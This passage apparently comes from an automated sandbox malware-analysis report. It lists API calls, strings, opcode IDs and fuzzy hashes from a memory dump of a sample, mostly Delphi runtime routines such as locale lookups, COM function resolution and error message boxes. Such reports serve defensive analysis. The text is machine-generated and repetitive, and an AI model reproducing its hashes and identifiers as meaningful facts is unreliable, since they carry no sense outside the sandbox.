                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                  • Instruction ID: f0c37261ab6db053e10553a06c8b861ca197687e6dec7a05d29167a6bd65f8f3
                                                                                                                  • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                  • Instruction Fuzzy Hash: 5BE0D872BD021417D711A558AC88EFA725D9758390F00D27ABD05D73C5FEF09E804AE9
                                                                                                                  APIs
                                                                                                                  • GetVersionExA.KERNEL32(?,02E8D106,00000000,02E8D11E), ref: 02E6B79A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889659487-0
                                                                                                                  • Opcode ID: 3fd9fcdbdc3e537f77e90d528ccdf5a8ce3cc9fee60a27765ebfe62f102516e6
                                                                                                                  • Instruction ID: bb3b8bec8c1f0b68af03ee4f02a35f1e70013656d3957c9a98d723fcf84eaeff
                                                                                                                  • Opcode Fuzzy Hash: 3fd9fcdbdc3e537f77e90d528ccdf5a8ce3cc9fee60a27765ebfe62f102516e6
                                                                                                                  • Instruction Fuzzy Hash: DEF0F4749C43019FD350DF2AD84662577E9FB49744F889D28F6D8C7380E739A454CB52
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02E6BE72,00000000,02E6C08B,?,?,00000000,00000000), ref: 02E6A823
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                  • Instruction ID: a2be9d4ca2c60cb992bf0dbaa0ce8f6e36c3cbb6dd1b3f8d165df0b3147180b8
                                                                                                                  • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                  • Instruction Fuzzy Hash: 2BD05EA278E2602AA210919A2D8CDBB5ADCCAC57E1F00907AB988C6201D2148C07DAB1
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 481472006-0
                                                                                                                  • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                  • Instruction ID: a17916198b9cc6d31d865cda458fc14685cedcbbe6570a15903819c7ec3bb915
                                                                                                                  • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                  • Instruction Fuzzy Hash: 68A01180888820828A8033282C02A383088A820A20FC8CB80B8F8802E0EA2E022080A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02E6D29D
                                                                                                                    • Part of subcall function 02E6D268: GetProcAddress.KERNEL32(00000000), ref: 02E6D281
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                  • Opcode ID: 9f50fc1ca287ccc596434db33c6f239c5dfba022e893b443ab8ac72beec3e051
                                                                                                                  • Instruction ID: d0dbdf07df951316fac64caa0d5abbe58742d8d110c908ce911ca388a10935fa
                                                                                                                  • Opcode Fuzzy Hash: 9f50fc1ca287ccc596434db33c6f239c5dfba022e893b443ab8ac72beec3e051
                                                                                                                  • Instruction Fuzzy Hash: 16416FA1BC82489B56046AAF7C0E437B79ED749B943E0F517F44CCF784D920EC92CA29
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02E76EDE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02E76EEF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02E76EFF
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02E76F0F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02E76F1F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02E76F2F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02E76F3F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                  • API String ID: 667068680-2233174745
                                                                                                                  • Opcode ID: 8ea4ee9cb9487dd64ffd31abe0a17888a600407b07d83a8b45323a2feb384477
                                                                                                                  • Instruction ID: 823828e99c907b81268feeaef6a2025f8e5b2ec8361214885e55b6be38b999aa
                                                                                                                  • Opcode Fuzzy Hash: 8ea4ee9cb9487dd64ffd31abe0a17888a600407b07d83a8b45323a2feb384477
                                                                                                                  • Instruction Fuzzy Hash: 5BF08CE0AD87417DFE04BF336C8583A2B5DA620A8C344FD55B85769502E6B898508F11
                                                                                                                  APIs
                                                                                                                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02E628CE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message
                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                  • API String ID: 2030045667-32948583
                                                                                                                  • Opcode ID: aa8c4bf6f11b3bef026a215672c0d305fb1fe39e6bd3b04c714f2491eb81537a
                                                                                                                  • Instruction ID: fc1033b5e9e739a8690afe9e6cb37c33e7b20a638d44cdf11b8056f926cc7659
                                                                                                                  • Opcode Fuzzy Hash: aa8c4bf6f11b3bef026a215672c0d305fb1fe39e6bd3b04c714f2491eb81537a
                                                                                                                  • Instruction Fuzzy Hash: B7A1E530EC42548BDF219A2CCC88BF876E5EB09394F14E0E5EE49AB285CB759985CF51
                                                                                                                  Strings
                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E62849
                                                                                                                  • 7, xrefs: 02E626A1
                                                                                                                  • , xrefs: 02E62814
                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 02E62690
                                                                                                                  • bytes: , xrefs: 02E6275D
                                                                                                                  • The unexpected small block leaks are:, xrefs: 02E62707
                                                                                                                  • Unexpected Memory Leak, xrefs: 02E628C0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                  • API String ID: 0-2723507874
                                                                                                                  • Opcode ID: df66c6891e8e2b4b61aa485f3ab6339244fbc7ca6df07e78b8bcf7adf9ab8f9b
                                                                                                                  • Instruction ID: f9a00a3b99ea45c93690537952913c28d326041cfe44ed42514b4a4505b99fc7
                                                                                                                  • Opcode Fuzzy Hash: df66c6891e8e2b4b61aa485f3ab6339244fbc7ca6df07e78b8bcf7adf9ab8f9b
                                                                                                                  • Instruction Fuzzy Hash: 2671C830BC42588FDF219A2CCC88BE8B6E5EB09794F10A1E5EA499B281DF7549C5CF51
                                                                                                                  APIs
                                                                                                                  • GetThreadLocale.KERNEL32(00000000,02E6C08B,?,?,00000000,00000000), ref: 02E6BDF6
                                                                                                                    • Part of subcall function 02E6A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                  • Opcode ID: bbcd3837a9d8eed8081e237900656dec10d758880a8652746330c1f48aefe20b
                                                                                                                  • Instruction ID: 08127e2cfdaadd2345fe98c09734111bf72b1f8522551f6873b12bc99d0e0c76
                                                                                                                  • Opcode Fuzzy Hash: bbcd3837a9d8eed8081e237900656dec10d758880a8652746330c1f48aefe20b
                                                                                                                  • Instruction Fuzzy Hash: E1614C30BC01889BDB10EBA4D85C6BF77BB9B98384F60F436B101AB385DA39D905DB54
                                                                                                                  APIs
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7B000
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02E7B017
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7B0AB
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002), ref: 02E7B0B7
                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02E7B0CB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Read$HandleModule
                                                                                                                  • String ID: KernelBase$LoadLibraryExA
                                                                                                                  • API String ID: 2226866862-113032527
                                                                                                                  • Opcode ID: f474eef75048e1cd0d4589b799d93a87b02f9556f65eca3999c46ed6df8bacf2
                                                                                                                  • Instruction ID: 9be7797071c90241f272cd8c262fd5bf2ffa8bafe82a35f3d9fe4c7975d5179c
                                                                                                                  • Opcode Fuzzy Hash: f474eef75048e1cd0d4589b799d93a87b02f9556f65eca3999c46ed6df8bacf2
                                                                                                                  • Instruction Fuzzy Hash: E3314171680605FBDB20DB69CC89F6977A8AF1535CF009514FA14AB2C1D374A9408B60
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?,02EE67C8,?,?,02E8E7A8,02E665B1,02E8D30D), ref: 02E64395
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?,02EE67C8,?,?,02E8E7A8,02E665B1,02E8D30D), ref: 02E6439B
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,02E643E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?,02EE67C8), ref: 02E643B0
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,02E643E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?), ref: 02E643B6
                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02E643D4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                  • Opcode ID: 5c9e36f261835e6a514927162e21c50b07297b086790d6bf9e7b8687383a57fd
                                                                                                                  • Instruction ID: 82f8a72c29551278289018f1898e4c5446babf86940cc58aa7d2583d09155b7f
                                                                                                                  • Opcode Fuzzy Hash: 5c9e36f261835e6a514927162e21c50b07297b086790d6bf9e7b8687383a57fd
                                                                                                                  • Instruction Fuzzy Hash: 39F09060EC4344B9FA21B2A07C4EF79275C5749BA5F58EA05B36D9C1C0C7A440C48B26
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E6AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E6AD59
                                                                                                                    • Part of subcall function 02E6AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E6AD7D
                                                                                                                    • Part of subcall function 02E6AD3C: GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E6AD98
                                                                                                                    • Part of subcall function 02E6AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E6AE2E
                                                                                                                  • CharToOemA.USER32(?,?), ref: 02E6AEFB
                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF18
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF1E
                                                                                                                  • GetStdHandle.KERNEL32(000000F4,02E6AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF33
                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,02E6AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF39
                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02E6AF5B
                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02E6AF71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 185507032-0
                                                                                                                  • Opcode ID: 57bde45d7cc925b0413ac00e69c5bb62bb3628f7e535f46569e991f59450730c
                                                                                                                  • Instruction ID: 75166800c907a162b210bd808fd40fae00e81d9f3f805f16727b6fef33fa912b
                                                                                                                  • Opcode Fuzzy Hash: 57bde45d7cc925b0413ac00e69c5bb62bb3628f7e535f46569e991f59450730c
                                                                                                                  • Instruction Fuzzy Hash: 7C1173B29D4200BFD600FB54CC89FAF77ED9B45780F809925B744EA1E0DA75E9448B63
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E6E625
                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E6E641
                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02E6E67A
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E6E6F7
                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02E6E710
                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 02E6E745
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 351091851-0
                                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                  • Instruction ID: f4dc06a378c96d028b03e2120307d97b3eedb92230438a0757d88ce025398dc6
                                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                  • Instruction Fuzzy Hash: A8511D799802299BCB62DB58CC84FE9B3BDAF48344F4491D5F508E7241E630AF808F60
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E635BA
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02E63609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E635ED
                                                                                                                  • RegCloseKey.ADVAPI32(?,02E63610,00000000,?,00000004,00000000,02E63609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E63603
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
